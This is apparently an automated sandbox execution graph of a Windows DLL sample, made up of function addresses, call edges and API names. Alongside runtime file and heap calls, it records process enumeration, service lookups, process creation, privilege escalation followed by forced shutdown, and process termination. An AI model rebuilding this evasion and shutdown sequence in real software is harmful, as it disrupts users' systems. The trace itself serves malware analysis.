                            execution_graph 63488 6cc501c3 63489 6cc501d5 __dosmaperr 63488->63489 63490 6cc501ed 63488->63490 63490->63489 63492 6cc50267 63490->63492 63493 6cc50238 __dosmaperr 63490->63493 63494 6cc50280 63492->63494 63495 6cc502d7 __wsopen_s 63492->63495 63496 6cc5029b __dosmaperr 63492->63496 63535 6cc43810 18 API calls __cftoe 63493->63535 63494->63496 63515 6cc50285 63494->63515 63529 6cc47eab HeapFree GetLastError _free 63495->63529 63528 6cc43810 18 API calls __cftoe 63496->63528 63498 6cc5042e 63501 6cc504a4 63498->63501 63504 6cc50447 GetConsoleMode 63498->63504 63503 6cc504a8 ReadFile 63501->63503 63502 6cc502f7 63530 6cc47eab HeapFree GetLastError _free 63502->63530 63506 6cc504c2 63503->63506 63507 6cc5051c GetLastError 63503->63507 63504->63501 63508 6cc50458 63504->63508 63506->63507 63510 6cc50499 63506->63510 63520 6cc502b2 __dosmaperr __wsopen_s 63507->63520 63508->63503 63511 6cc5045e ReadConsoleW 63508->63511 63509 6cc502fe 63509->63520 63531 6cc4e359 20 API calls __wsopen_s 63509->63531 63516 6cc504e7 63510->63516 63517 6cc504fe 63510->63517 63510->63520 63511->63510 63513 6cc5047a GetLastError 63511->63513 63513->63520 63523 6cc550d5 63515->63523 63533 6cc505ee 23 API calls 3 library calls 63516->63533 63519 6cc50515 63517->63519 63517->63520 63534 6cc508a6 21 API calls __wsopen_s 63519->63534 63532 6cc47eab HeapFree GetLastError _free 63520->63532 63522 6cc5051a 63522->63520 63525 6cc550ef 63523->63525 63526 6cc550e2 63523->63526 63524 6cc550fb 63524->63498 63525->63524 63536 6cc43810 18 API calls __cftoe 63525->63536 63526->63498 63528->63520 63529->63502 63530->63509 63531->63515 63532->63489 63533->63520 63534->63522 63535->63489 63536->63526 63537 6cab4b53 63695 6cc3a133 63537->63695 63539 6cab4b5c _Yarn 63709 6cc2e090 63539->63709 63541 6cad639e 63802 6cc43820 18 API calls 2 library calls 63541->63802 63543 6cab4cff 63544 6cab5164 CreateFileA CloseHandle 63549 6cab51ec 63544->63549 63545 6cab4bae std::ios_base::_Ios_base_dtor 63545->63541 63545->63543 63545->63544 63546 6cac245a _Yarn _strlen 63545->63546 63546->63541 63547 6cc2e090 2 API calls 63546->63547 63562 6cac2a83 std::ios_base::_Ios_base_dtor 63547->63562 63715 6cc38810 OpenSCManagerA 63549->63715 63551 6cabfc00 63794 6cc38930 CreateToolhelp32Snapshot 63551->63794 63554 6cc3a133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63589 6cab5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63554->63589 63556 6cac37d0 Sleep 63601 6cac37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63556->63601 63557 6cc2e090 2 API calls 63557->63589 63558 6cad63b2 63803 6cab15e0 18 API calls std::ios_base::_Ios_base_dtor 63558->63803 63559 6cc38930 4 API calls 63577 6cac053a 63559->63577 63560 6cc38930 4 API calls 63582 6cac12e2 63560->63582 63562->63541 63719 6cc20880 63562->63719 63563 6cad64f8 63564 6cabffe3 63564->63559 63568 6cac0abc 63564->63568 63565 6cad6ba0 104 API calls 63565->63589 63566 6cad6e60 32 API calls 63566->63589 63568->63546 63568->63560 63570 6cc38930 4 API calls 63570->63568 63571 6cc38930 4 API calls 63590 6cac1dd9 63571->63590 63572 6cac211c 63572->63546 63573 6cac241a 63572->63573 63576 6cc20880 10 API calls 63573->63576 63574 6cc2e090 2 API calls 63574->63601 63579 6cac244d 63576->63579 63577->63568 63577->63570 63578 6cab6722 63770 6cc34860 25 API calls 4 library calls 63578->63770 63800 6cc39450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63579->63800 63581 6cac2452 Sleep 63581->63546 63582->63571 63582->63572 63594 6cac16ac 63582->63594 63583 6cab6162 63584 6cab740b 63771 6cc386e0 CreateProcessA 63584->63771 63586 6cc38930 4 API calls 63586->63572 63589->63541 63589->63551 63589->63554 63589->63557 63589->63565 63589->63566 63589->63578 63589->63583 63756 6cad7090 63589->63756 63769 6cafe010 67 API calls 63589->63769 63590->63572 63590->63586 63591 6cad7090 77 API calls 63591->63601 63593 6cab775a _strlen 63593->63541 63595 6cab7ba9 63593->63595 63596 6cab7b92 63593->63596 63599 6cab7b43 _Yarn 63593->63599 63598 6cc3a133 std::_Facet_Register 4 API calls 63595->63598 63597 6cc3a133 std::_Facet_Register 4 API calls 63596->63597 63597->63599 63598->63599 63600 6cc2e090 2 API calls 63599->63600 63610 6cab7be7 std::ios_base::_Ios_base_dtor 63600->63610 63601->63541 63601->63574 63601->63591 63727 6cad6ba0 63601->63727 63746 6cad6e60 63601->63746 63801 6cafe010 67 API calls 63601->63801 63602 6cc386e0 4 API calls 63613 6cab8a07 63602->63613 63603 6cab9d68 63606 6cc3a133 std::_Facet_Register 4 API calls 63603->63606 63604 6cab9d7f 63607 6cc3a133 std::_Facet_Register 4 API calls 63604->63607 63605 6cab962c _strlen 63605->63541 63605->63603 63605->63604 63608 6cab9d18 _Yarn 63605->63608 63606->63608 63607->63608 63609 6cc2e090 2 API calls 63608->63609 63614 6cab9dbd std::ios_base::_Ios_base_dtor 63609->63614 63610->63541 63610->63602 63610->63605 63611 6cab8387 63610->63611 63612 6cc386e0 4 API calls 63625 6cab9120 63612->63625 63613->63612 63614->63541 63615 6cc386e0 4 API calls 63614->63615 63623 6cabe8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63614->63623 63632 6caba215 _strlen 63615->63632 63616 6cc386e0 4 API calls 63618 6cab9624 63616->63618 63617 6cc3a133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63617->63623 63775 6cc39450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63618->63775 63620 6cc2e090 2 API calls 63620->63623 63621 6cabed02 Sleep 63643 6cabe8c1 63621->63643 63622 6cabf7b1 63793 6cc39450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63622->63793 63623->63541 63623->63617 63623->63620 63623->63621 63623->63622 63625->63616 63626 6cabe8dd GetCurrentProcess TerminateProcess 63626->63623 63627 6caba9bb 63630 6cc3a133 std::_Facet_Register 4 API calls 63627->63630 63628 6caba9a4 63629 6cc3a133 std::_Facet_Register 4 API calls 63628->63629 63638 6caba953 _Yarn _strlen 63629->63638 63630->63638 63631 6cc386e0 4 API calls 63631->63643 63632->63541 63632->63627 63632->63628 63632->63638 63633 6cabfbb8 63634 6cabfbe8 ExitWindowsEx Sleep 63633->63634 63634->63551 63635 6cabf7c0 63635->63633 63636 6cabb009 63640 6cc3a133 std::_Facet_Register 4 API calls 63636->63640 63637 6cabaff0 63639 6cc3a133 std::_Facet_Register 4 API calls 63637->63639 63638->63558 63638->63636 63638->63637 63641 6cabafa0 _Yarn 63638->63641 63639->63641 63640->63641 63776 6cc39050 63641->63776 63643->63623 63643->63626 63643->63631 63644 6cabb059 std::ios_base::_Ios_base_dtor _strlen 63644->63541 63645 6cabb42c 63644->63645 63646 6cabb443 63644->63646 63649 6cabb3da _Yarn _strlen 63644->63649 63647 6cc3a133 std::_Facet_Register 4 API calls 63645->63647 63648 6cc3a133 std::_Facet_Register 4 API calls 63646->63648 63647->63649 63648->63649 63649->63558 63650 6cabb79e 63649->63650 63651 6cabb7b7 63649->63651 63654 6cabb751 _Yarn 63649->63654 63652 6cc3a133 std::_Facet_Register 4 API calls 63650->63652 63653 6cc3a133 std::_Facet_Register 4 API calls 63651->63653 63652->63654 63653->63654 63655 6cc39050 104 API calls 63654->63655 63656 6cabb804 std::ios_base::_Ios_base_dtor _strlen 63655->63656 63656->63541 63657 6cabbc0f 63656->63657 63658 6cabbc26 63656->63658 63661 6cabbbbd _Yarn _strlen 63656->63661 63660 6cc3a133 std::_Facet_Register 4 API calls 63657->63660 63659 6cc3a133 std::_Facet_Register 4 API calls 63658->63659 63659->63661 63660->63661 63661->63558 63662 6cabc08e 63661->63662 63663 6cabc075 63661->63663 63666 6cabc028 _Yarn 63661->63666 63665 6cc3a133 std::_Facet_Register 4 API calls 63662->63665 63664 6cc3a133 std::_Facet_Register 4 API calls 63663->63664 63664->63666 63665->63666 63667 6cc39050 104 API calls 63666->63667 63672 6cabc0db std::ios_base::_Ios_base_dtor _strlen 63667->63672 63668 6cabc7bc 63671 6cc3a133 std::_Facet_Register 4 API calls 63668->63671 63669 6cabc7a5 63670 6cc3a133 std::_Facet_Register 4 API calls 63669->63670 63679 6cabc753 _Yarn _strlen 63670->63679 63671->63679 63672->63541 63672->63668 63672->63669 63672->63679 63673 6cabd3ed 63675 6cc3a133 std::_Facet_Register 4 API calls 63673->63675 63674 6cabd406 63676 6cc3a133 std::_Facet_Register 4 API calls 63674->63676 63677 6cabd39a _Yarn 63675->63677 63676->63677 63678 6cc39050 104 API calls 63677->63678 63680 6cabd458 std::ios_base::_Ios_base_dtor _strlen 63678->63680 63679->63558 63679->63673 63679->63674 63679->63677 63685 6cabcb2f 63679->63685 63680->63541 63681 6cabd8bb 63680->63681 63682 6cabd8a4 63680->63682 63686 6cabd852 _Yarn _strlen 63680->63686 63684 6cc3a133 std::_Facet_Register 4 API calls 63681->63684 63683 6cc3a133 std::_Facet_Register 4 API calls 63682->63683 63683->63686 63684->63686 63686->63558 63687 6cabdccf 63686->63687 63688 6cabdcb6 63686->63688 63691 6cabdc69 _Yarn 63686->63691 63690 6cc3a133 std::_Facet_Register 4 API calls 63687->63690 63689 6cc3a133 std::_Facet_Register 4 API calls 63688->63689 63689->63691 63690->63691 63692 6cc39050 104 API calls 63691->63692 63694 6cabdd1c std::ios_base::_Ios_base_dtor 63692->63694 63693 6cc386e0 4 API calls 63693->63623 63694->63541 63694->63693 63697 6cc3a138 63695->63697 63696 6cc3a152 63696->63539 63697->63696 63700 6cc3a154 std::_Facet_Register 63697->63700 63804 6cc42704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63697->63804 63699 6cc3afb3 std::_Facet_Register 63808 6cc3ca69 RaiseException 63699->63808 63700->63699 63805 6cc3ca69 RaiseException 63700->63805 63702 6cc3b7ac IsProcessorFeaturePresent 63708 6cc3b7d1 63702->63708 63704 6cc3af73 63806 6cc3ca69 RaiseException 63704->63806 63706 6cc3af93 std::invalid_argument::invalid_argument 63807 6cc3ca69 RaiseException 63706->63807 63708->63539 63710 6cc2e0a6 FindFirstFileA 63709->63710 63711 6cc2e0a4 63709->63711 63712 6cc2e0e0 63710->63712 63711->63710 63713 6cc2e13c 63712->63713 63714 6cc2e0e2 FindClose 63712->63714 63713->63545 63714->63712 63717 6cc38846 63715->63717 63716 6cc388be OpenServiceA 63716->63717 63717->63716 63718 6cc38922 63717->63718 63718->63589 63720 6cc20893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63719->63720 63721 6cc24e71 CloseHandle 63720->63721 63722 6cac37cb 63720->63722 63723 6cc23bd1 CloseHandle 63720->63723 63725 6cc0cea0 WriteFile ReadFile WriteFile WriteFile 63720->63725 63809 6cc0c390 63720->63809 63721->63720 63726 6cc39450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63722->63726 63723->63720 63725->63720 63726->63556 63728 6cad6bd5 63727->63728 63820 6cb02020 63728->63820 63730 6cad6c68 63731 6cc3a133 std::_Facet_Register 4 API calls 63730->63731 63732 6cad6ca0 63731->63732 63837 6cc3aa17 63732->63837 63734 6cad6cb4 63849 6cb01d90 63734->63849 63737 6cad6d8e 63737->63601 63739 6cad6dc8 63857 6cb026e0 24 API calls 4 library calls 63739->63857 63741 6cad6dda 63858 6cc3ca69 RaiseException 63741->63858 63743 6cad6def 63859 6cafe010 67 API calls 63743->63859 63745 6cad6e0f 63745->63601 63747 6cad6e9f 63746->63747 63750 6cad6eb3 63747->63750 64249 6cb03560 32 API calls std::_Xinvalid_argument 63747->64249 63753 6cad6f5b 63750->63753 64251 6cb02250 30 API calls 63750->64251 64252 6cb026e0 24 API calls 4 library calls 63750->64252 64253 6cc3ca69 RaiseException 63750->64253 63752 6cad6f6e 63752->63601 63753->63752 64250 6cb037e0 32 API calls std::_Xinvalid_argument 63753->64250 63757 6cad709e 63756->63757 63761 6cad70d1 63756->63761 64254 6cb001f0 63757->64254 63759 6cad7183 63759->63589 63761->63759 64258 6cb02250 30 API calls 63761->64258 63762 6cc44208 67 API calls 63762->63761 63764 6cad71ae 64259 6cb02340 24 API calls 63764->64259 63766 6cad71be 64260 6cc3ca69 RaiseException 63766->64260 63768 6cad71c9 63769->63589 63770->63584 63772 6cc38770 63771->63772 63773 6cc387b0 WaitForSingleObject CloseHandle CloseHandle 63772->63773 63774 6cc387a4 63772->63774 63773->63772 63774->63593 63775->63605 63777 6cc390a7 63776->63777 64306 6cc396e0 63777->64306 63779 6cc390b8 63780 6cad6ba0 104 API calls 63779->63780 63784 6cc390dc 63780->63784 63782 6cc3918f std::ios_base::_Ios_base_dtor 64359 6cafe010 67 API calls 63782->64359 63786 6cc39144 63784->63786 63792 6cc39157 63784->63792 64325 6cc39a30 63784->64325 64333 6cb13010 63784->64333 64343 6cc39280 63786->64343 63787 6cc391d2 std::ios_base::_Ios_base_dtor 63787->63644 63790 6cc3914c 63791 6cad7090 77 API calls 63790->63791 63791->63792 64358 6cafe010 67 API calls 63792->64358 63793->63635 63799 6cc38966 std::locale::_Setgloballocale 63794->63799 63795 6cc38a64 Process32NextW 63795->63799 63796 6cc38a14 CloseHandle 63796->63799 63797 6cc38a45 Process32FirstW 63797->63799 63798 6cc38a96 63798->63564 63799->63795 63799->63796 63799->63797 63799->63798 63800->63581 63801->63601 63803->63563 63804->63697 63805->63704 63806->63706 63807->63699 63808->63702 63810 6cc0c3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63809->63810 63811 6cc0ce3c 63810->63811 63812 6cc0cab9 CreateFileA 63810->63812 63814 6cc0b4d0 63810->63814 63811->63720 63812->63810 63816 6cc0b4e3 __wsopen_s std::locale::_Setgloballocale 63814->63816 63815 6cc0c206 WriteFile 63815->63816 63816->63815 63817 6cc0c377 63816->63817 63818 6cc0b619 WriteFile 63816->63818 63819 6cc0bc23 ReadFile 63816->63819 63817->63810 63818->63816 63819->63816 63821 6cc3a133 std::_Facet_Register 4 API calls 63820->63821 63822 6cb0207e 63821->63822 63823 6cc3aa17 43 API calls 63822->63823 63824 6cb02092 63823->63824 63860 6cb02f60 42 API calls 4 library calls 63824->63860 63826 6cb020c8 63827 6cb0210d 63826->63827 63828 6cb02136 63826->63828 63829 6cb02120 63827->63829 63861 6cc3a67e 9 API calls 2 library calls 63827->63861 63862 6cb02250 30 API calls 63828->63862 63829->63730 63832 6cb0215b 63863 6cb02340 24 API calls 63832->63863 63834 6cb02171 63864 6cc3ca69 RaiseException 63834->63864 63836 6cb0217c 63836->63730 63838 6cc3aa23 __EH_prolog3 63837->63838 63865 6cc3a5a5 63838->63865 63843 6cc3aa41 63879 6cc3aaaa 39 API calls std::locale::_Setgloballocale 63843->63879 63844 6cc3aa9c 63844->63734 63846 6cc3aa49 63880 6cc3a8a1 HeapFree GetLastError _Yarn ___std_exception_destroy 63846->63880 63848 6cc3aa5f 63871 6cc3a5d6 63848->63871 63850 6cad6d5d 63849->63850 63851 6cb01ddc 63849->63851 63850->63737 63856 6cb02250 30 API calls 63850->63856 63885 6cc3ab37 63851->63885 63855 6cb01e82 63856->63739 63857->63741 63858->63743 63859->63745 63860->63826 63861->63829 63862->63832 63863->63834 63864->63836 63866 6cc3a5b4 63865->63866 63867 6cc3a5bb 63865->63867 63881 6cc43abd 6 API calls std::_Lockit::_Lockit 63866->63881 63868 6cc3a5b9 63867->63868 63882 6cc3bc7b EnterCriticalSection 63867->63882 63868->63848 63878 6cc3a920 6 API calls 2 library calls 63868->63878 63872 6cc3a5e0 63871->63872 63873 6cc43acb 63871->63873 63877 6cc3a5f3 63872->63877 63883 6cc3bc89 LeaveCriticalSection 63872->63883 63884 6cc43aa6 LeaveCriticalSection 63873->63884 63876 6cc43ad2 63876->63844 63877->63844 63878->63843 63879->63846 63880->63848 63881->63868 63882->63868 63883->63877 63884->63876 63886 6cc3ab40 63885->63886 63887 6cb01dea 63886->63887 63894 6cc4343a 63886->63894 63887->63850 63893 6cc3fc53 18 API calls __cftoe 63887->63893 63889 6cc3ab8c 63889->63887 63905 6cc43148 65 API calls 63889->63905 63891 6cc3aba7 63891->63887 63906 6cc44208 63891->63906 63893->63855 63895 6cc43445 __wsopen_s 63894->63895 63896 6cc43458 63895->63896 63897 6cc43478 63895->63897 63931 6cc43810 18 API calls __cftoe 63896->63931 63901 6cc43468 63897->63901 63917 6cc4e4fc 63897->63917 63901->63889 63905->63891 63907 6cc44214 __wsopen_s 63906->63907 63908 6cc44233 63907->63908 63909 6cc4421e 63907->63909 63914 6cc4422e 63908->63914 64112 6cc3fc99 EnterCriticalSection 63908->64112 64127 6cc43810 18 API calls __cftoe 63909->64127 63911 6cc44250 64113 6cc4428c 63911->64113 63914->63887 63915 6cc4425b 64128 6cc44282 LeaveCriticalSection 63915->64128 63918 6cc4e508 __wsopen_s 63917->63918 63933 6cc43a8f EnterCriticalSection 63918->63933 63920 6cc4e516 63934 6cc4e5a0 63920->63934 63925 6cc4e662 63926 6cc4e781 63925->63926 63958 6cc4e804 63926->63958 63929 6cc434bc 63932 6cc434e5 LeaveCriticalSection 63929->63932 63931->63901 63932->63901 63933->63920 63935 6cc4e5c3 63934->63935 63936 6cc4e61b 63935->63936 63943 6cc4e523 63935->63943 63951 6cc3fc99 EnterCriticalSection 63935->63951 63952 6cc3fcad LeaveCriticalSection 63935->63952 63953 6cc4a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63936->63953 63938 6cc4e624 63954 6cc47eab HeapFree GetLastError _free 63938->63954 63941 6cc4e62d 63941->63943 63955 6cc4a30f 6 API calls std::_Lockit::_Lockit 63941->63955 63948 6cc4e55c 63943->63948 63944 6cc4e64c 63956 6cc3fc99 EnterCriticalSection 63944->63956 63947 6cc4e65f 63947->63943 63957 6cc43aa6 LeaveCriticalSection 63948->63957 63950 6cc43493 63950->63901 63950->63925 63951->63935 63952->63935 63953->63938 63954->63941 63955->63944 63956->63947 63957->63950 63959 6cc4e823 63958->63959 63960 6cc4e836 63959->63960 63965 6cc4e84b 63959->63965 63974 6cc43810 18 API calls __cftoe 63960->63974 63962 6cc4e797 63962->63929 63971 6cc576ce 63962->63971 63963 6cc4e96b 63963->63962 63978 6cc43810 18 API calls __cftoe 63963->63978 63965->63963 63975 6cc57598 37 API calls __cftoe 63965->63975 63967 6cc4e9bb 63967->63963 63976 6cc57598 37 API calls __cftoe 63967->63976 63969 6cc4e9d9 63969->63963 63977 6cc57598 37 API calls __cftoe 63969->63977 63979 6cc57a86 63971->63979 63974->63962 63975->63967 63976->63969 63977->63963 63978->63962 63981 6cc57a92 __wsopen_s 63979->63981 63980 6cc57a99 63997 6cc43810 18 API calls __cftoe 63980->63997 63981->63980 63982 6cc57ac4 63981->63982 63988 6cc576ee 63982->63988 63987 6cc576e9 63987->63929 63999 6cc43dbb 63988->63999 63993 6cc57724 63996 6cc57756 63993->63996 64039 6cc47eab HeapFree GetLastError _free 63993->64039 63998 6cc57b1b LeaveCriticalSection __wsopen_s 63996->63998 63997->63987 63998->63987 64040 6cc3f3db 63999->64040 64002 6cc43ddf 64004 6cc3f4e6 64002->64004 64049 6cc3f53e 64004->64049 64006 6cc3f4fe 64006->63993 64007 6cc5775c 64006->64007 64064 6cc57bdc 64007->64064 64013 6cc57882 GetFileType 64016 6cc578d4 64013->64016 64017 6cc5788d GetLastError 64013->64017 64014 6cc5778e __dosmaperr 64014->63993 64015 6cc57857 GetLastError 64015->64014 64094 6cc54ea0 SetStdHandle __dosmaperr __wsopen_s 64016->64094 64093 6cc430e2 __dosmaperr _free 64017->64093 64018 6cc57805 64018->64013 64018->64015 64092 6cc57b47 CreateFileW 64018->64092 64021 6cc5789b CloseHandle 64021->64014 64036 6cc578c4 64021->64036 64023 6cc5784a 64023->64013 64023->64015 64024 6cc578f5 64025 6cc57941 64024->64025 64095 6cc57d56 70 API calls 2 library calls 64024->64095 64030 6cc57948 64025->64030 64109 6cc57e00 70 API calls 2 library calls 64025->64109 64028 6cc57976 64029 6cc57984 64028->64029 64028->64030 64029->64014 64032 6cc57a00 CloseHandle 64029->64032 64096 6cc4f015 64030->64096 64110 6cc57b47 CreateFileW 64032->64110 64034 6cc57a2b 64035 6cc57a35 GetLastError 64034->64035 64034->64036 64037 6cc57a41 __dosmaperr 64035->64037 64036->64014 64111 6cc54e0f SetStdHandle __dosmaperr __wsopen_s 64037->64111 64039->63996 64041 6cc3f3fb 64040->64041 64042 6cc3f3f2 64040->64042 64041->64042 64043 6cc480a2 __Getctype 37 API calls 64041->64043 64042->64002 64048 6cc4a0c5 5 API calls std::_Lockit::_Lockit 64042->64048 64044 6cc3f41b 64043->64044 64045 6cc48618 __Getctype 37 API calls 64044->64045 64046 6cc3f431 64045->64046 64047 6cc48645 __cftoe 37 API calls 64046->64047 64047->64042 64048->64002 64050 6cc3f566 64049->64050 64051 6cc3f54c 64049->64051 64053 6cc3f56d 64050->64053 64054 6cc3f58c 64050->64054 64052 6cc3f4cc __wsopen_s HeapFree GetLastError 64051->64052 64058 6cc3f556 __dosmaperr 64052->64058 64056 6cc3f48d __wsopen_s HeapFree GetLastError 64053->64056 64053->64058 64055 6cc47f33 __fassign MultiByteToWideChar 64054->64055 64059 6cc3f59b 64055->64059 64056->64058 64057 6cc3f5a2 GetLastError 64057->64058 64058->64006 64059->64057 64060 6cc3f5c8 64059->64060 64061 6cc3f48d __wsopen_s HeapFree GetLastError 64059->64061 64060->64058 64062 6cc47f33 __fassign MultiByteToWideChar 64060->64062 64061->64060 64063 6cc3f5df 64062->64063 64063->64057 64063->64058 64065 6cc57c17 64064->64065 64067 6cc57bfd 64064->64067 64066 6cc57b6c __wsopen_s 18 API calls 64065->64066 64071 6cc57c4f 64066->64071 64067->64065 64068 6cc43810 __cftoe 18 API calls 64067->64068 64068->64065 64069 6cc57c7e 64070 6cc59001 __wsopen_s 18 API calls 64069->64070 64075 6cc57779 64069->64075 64072 6cc57ccc 64070->64072 64071->64069 64074 6cc43810 __cftoe 18 API calls 64071->64074 64073 6cc57d49 64072->64073 64072->64075 64076 6cc4383d __Getctype 11 API calls 64073->64076 64074->64069 64075->64014 64078 6cc54cfc 64075->64078 64077 6cc57d55 64076->64077 64079 6cc54d08 __wsopen_s 64078->64079 64080 6cc43a8f std::_Lockit::_Lockit EnterCriticalSection 64079->64080 64081 6cc54d0f 64080->64081 64082 6cc54d34 64081->64082 64087 6cc54da3 EnterCriticalSection 64081->64087 64089 6cc54d56 64081->64089 64084 6cc54f32 __wsopen_s 11 API calls 64082->64084 64083 6cc54e06 __wsopen_s LeaveCriticalSection 64085 6cc54d76 64083->64085 64086 6cc54d39 64084->64086 64085->64014 64091 6cc57b47 CreateFileW 64085->64091 64088 6cc55080 __wsopen_s EnterCriticalSection 64086->64088 64086->64089 64087->64089 64090 6cc54db0 LeaveCriticalSection 64087->64090 64088->64089 64089->64083 64090->64081 64091->64018 64092->64023 64093->64021 64094->64024 64095->64025 64097 6cc54c92 __wsopen_s 18 API calls 64096->64097 64100 6cc4f025 64097->64100 64098 6cc4f02b 64099 6cc54e0f __wsopen_s SetStdHandle 64098->64099 64107 6cc4f083 __dosmaperr 64099->64107 64100->64098 64101 6cc54c92 __wsopen_s 18 API calls 64100->64101 64108 6cc4f05d 64100->64108 64104 6cc4f054 64101->64104 64102 6cc54c92 __wsopen_s 18 API calls 64103 6cc4f069 CloseHandle 64102->64103 64103->64098 64105 6cc4f075 GetLastError 64103->64105 64106 6cc54c92 __wsopen_s 18 API calls 64104->64106 64105->64098 64106->64108 64107->64014 64108->64098 64108->64102 64109->64028 64110->64034 64111->64036 64112->63911 64114 6cc442ae 64113->64114 64115 6cc44299 64113->64115 64119 6cc442a9 64114->64119 64129 6cc443a9 64114->64129 64151 6cc43810 18 API calls __cftoe 64115->64151 64119->63915 64123 6cc442d1 64144 6cc4ef88 64123->64144 64125 6cc442d7 64125->64119 64152 6cc47eab HeapFree GetLastError _free 64125->64152 64127->63914 64128->63914 64130 6cc443c1 64129->64130 64134 6cc442c3 64129->64134 64131 6cc4d350 18 API calls 64130->64131 64130->64134 64132 6cc443df 64131->64132 64153 6cc4f25c 64132->64153 64135 6cc4be2e 64134->64135 64136 6cc4be45 64135->64136 64137 6cc442cb 64135->64137 64136->64137 64236 6cc47eab HeapFree GetLastError _free 64136->64236 64139 6cc4d350 64137->64139 64140 6cc4d371 64139->64140 64141 6cc4d35c 64139->64141 64140->64123 64237 6cc43810 18 API calls __cftoe 64141->64237 64143 6cc4d36c 64143->64123 64145 6cc4efae 64144->64145 64149 6cc4ef99 __dosmaperr 64144->64149 64146 6cc4efd5 64145->64146 64148 6cc4eff7 __dosmaperr 64145->64148 64238 6cc4f0b1 64146->64238 64246 6cc43810 18 API calls __cftoe 64148->64246 64149->64125 64151->64119 64152->64119 64154 6cc4f268 __wsopen_s 64153->64154 64155 6cc4f270 __dosmaperr 64154->64155 64156 6cc4f2ba 64154->64156 64158 6cc4f323 __dosmaperr 64154->64158 64155->64134 64164 6cc55080 EnterCriticalSection 64156->64164 64194 6cc43810 18 API calls __cftoe 64158->64194 64159 6cc4f2c0 64162 6cc4f2dc __dosmaperr 64159->64162 64165 6cc4f34e 64159->64165 64193 6cc4f31b LeaveCriticalSection __wsopen_s 64162->64193 64164->64159 64166 6cc4f370 64165->64166 64192 6cc4f38c __dosmaperr 64165->64192 64167 6cc4f3c4 64166->64167 64169 6cc4f374 __dosmaperr 64166->64169 64168 6cc4f3d7 64167->64168 64203 6cc4e359 20 API calls __wsopen_s 64167->64203 64195 6cc4f530 64168->64195 64202 6cc43810 18 API calls __cftoe 64169->64202 64174 6cc4f42c 64176 6cc4f485 WriteFile 64174->64176 64177 6cc4f440 64174->64177 64175 6cc4f3ed 64178 6cc4f416 64175->64178 64179 6cc4f3f1 64175->64179 64180 6cc4f4a9 GetLastError 64176->64180 64176->64192 64182 6cc4f475 64177->64182 64183 6cc4f44b 64177->64183 64205 6cc4f5a1 43 API calls 5 library calls 64178->64205 64179->64192 64204 6cc4f94b 6 API calls __wsopen_s 64179->64204 64180->64192 64208 6cc4f9b3 7 API calls 2 library calls 64182->64208 64184 6cc4f465 64183->64184 64185 6cc4f450 64183->64185 64207 6cc4fb77 8 API calls 3 library calls 64184->64207 64189 6cc4f455 64185->64189 64185->64192 64188 6cc4f463 64188->64192 64206 6cc4fa8e 7 API calls 2 library calls 64189->64206 64192->64162 64193->64155 64194->64155 64196 6cc550d5 __wsopen_s 18 API calls 64195->64196 64198 6cc4f541 64196->64198 64197 6cc4f3e8 64197->64174 64197->64175 64198->64197 64209 6cc480a2 GetLastError 64198->64209 64201 6cc4f57e GetConsoleMode 64201->64197 64202->64192 64203->64168 64204->64192 64205->64192 64206->64188 64207->64188 64208->64188 64210 6cc480bf 64209->64210 64211 6cc480b9 64209->64211 64212 6cc4a252 __Getctype 6 API calls 64210->64212 64216 6cc480c5 SetLastError 64210->64216 64213 6cc4a213 __Getctype 6 API calls 64211->64213 64214 6cc480dd 64212->64214 64213->64210 64215 6cc480e1 64214->64215 64214->64216 64217 6cc4a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64215->64217 64222 6cc48153 64216->64222 64223 6cc48159 64216->64223 64219 6cc480ed 64217->64219 64220 6cc480f5 64219->64220 64221 6cc4810c 64219->64221 64225 6cc4a252 __Getctype 6 API calls 64220->64225 64224 6cc4a252 __Getctype 6 API calls 64221->64224 64222->64197 64222->64201 64226 6cc441b9 __Getctype 35 API calls 64223->64226 64227 6cc48118 64224->64227 64228 6cc48103 64225->64228 64229 6cc4815e 64226->64229 64230 6cc4811c 64227->64230 64231 6cc4812d 64227->64231 64233 6cc47eab _free HeapFree GetLastError 64228->64233 64232 6cc4a252 __Getctype 6 API calls 64230->64232 64235 6cc47eab _free HeapFree GetLastError 64231->64235 64232->64228 64234 6cc48109 64233->64234 64234->64216 64235->64234 64236->64137 64237->64143 64239 6cc4f0bd __wsopen_s 64238->64239 64247 6cc55080 EnterCriticalSection 64239->64247 64241 6cc4f0cb 64242 6cc4f015 __wsopen_s 21 API calls 64241->64242 64243 6cc4f0f8 64241->64243 64242->64243 64248 6cc4f131 LeaveCriticalSection __wsopen_s 64243->64248 64245 6cc4f11a 64245->64149 64246->64149 64247->64241 64248->64245 64249->63750 64250->63752 64251->63750 64252->63750 64253->63750 64255 6cb0022e 64254->64255 64256 6cad70c4 64255->64256 64261 6cc44ecb 64255->64261 64256->63762 64258->63764 64259->63766 64260->63768 64262 6cc44ef6 64261->64262 64263 6cc44ed9 64261->64263 64262->64255 64263->64262 64264 6cc44ee6 64263->64264 64265 6cc44efa 64263->64265 64277 6cc43810 18 API calls __cftoe 64264->64277 64269 6cc450f2 64265->64269 64270 6cc450fe __wsopen_s 64269->64270 64278 6cc3fc99 EnterCriticalSection 64270->64278 64272 6cc4510c 64279 6cc450af 64272->64279 64276 6cc44f2c 64276->64255 64277->64262 64278->64272 64287 6cc4bc96 64279->64287 64285 6cc450e9 64286 6cc45141 LeaveCriticalSection 64285->64286 64286->64276 64288 6cc4d350 18 API calls 64287->64288 64289 6cc4bca7 64288->64289 64290 6cc550d5 __wsopen_s 18 API calls 64289->64290 64292 6cc4bcad __wsopen_s 64290->64292 64291 6cc450c3 64294 6cc44f2e 